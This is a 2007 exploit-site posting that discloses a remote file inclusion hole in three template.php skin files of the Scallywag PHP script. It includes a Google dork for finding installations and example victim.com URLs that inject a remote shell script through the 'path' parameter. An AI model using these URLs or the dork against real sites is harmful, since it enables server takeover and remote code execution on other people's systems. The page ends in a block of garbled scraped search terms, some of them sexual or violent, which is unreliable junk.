about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Scallywag (template.php path) Remote File Inclusion Vulnerabilities



2007-05-23 Scallywag (template.php path) Remote File Inclusion Vulnerabilities
Rated as : Moderate Risk

##############################################################################################
#Scallywag  <=  Remote File Inclusion Vulnerability                    
                     #
#                                                                         
                  # 
#Dork:"Powered by Scallywag"                                    
                            #
#                                                                         
                  #
#                                                                         
                  # 
##############################################################################################
#Vuln Code                                                                
                  #  
#                                                                         
                  # 
#ERROR1:skin/dark/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG1:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################

#                                                                         
                  # 
#ERROR2:skin/gold/template.php                                            
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     # 
#                                                                         
                  # 
#                                                                         
                  # 
#BUG2:                                                                    
                  # 
#                                                                         
                  # 
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL
Script]]                #
##############################################################################################
#                                                                         
                  # 
#ERROR3:skin/original/template.php                                        
                  # 
#                                                                         
                  # 
# <?php                                                                
                     # 
# include("$path/source/top.txt"); <<< RFI CODE        
                                     #
#                                                                         
                  # 
#                                                                         
                  # 
#BUG3:                                                                    
                  # 
#                                                                         
                  # 
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL
Script]]           #
##############################################################################################
#                                                                         
                  # 
#Script Download                                                          
                  # 
##############################################################################################
#                                                                         
                  # 
#http://www.woweb.ru/load/82-1-0-3791                                     
                  # 
#                                                                         
                  # 
##############################################################################################

#                                                                         
                  # 
#Cyber-Security                                                           
                  # 
#                                                                         
                  # 
##############################################################################################
##############################################################################################
securitydot.net - 2007-05-23

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 10:05:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
reibold wap.porn.c www.52t.co xp bypass Www.sexghi www.ktvtop alt-n Mdae www.52t.co www.renliu Www. Cexo iranian se Foot fetis wwww 89com Www.homose Www.video. www.haoae. nuked-klan Nada sapa ram.com www.womens t510t Sexophone Crack+Data www.wfbyqh www.boboyi wimdows200 show18.cn news for c telecharge microsoft Hansica www.clove8 qqqnow.com 266038 ali88.5d6d free hindi FREEFILMS all seks search/exp Www.indea. rape vedio news for C pboard www.95ms.c MySQL 4.1. tror inte Able2Extr m...robots shtml.exe www.tu67.c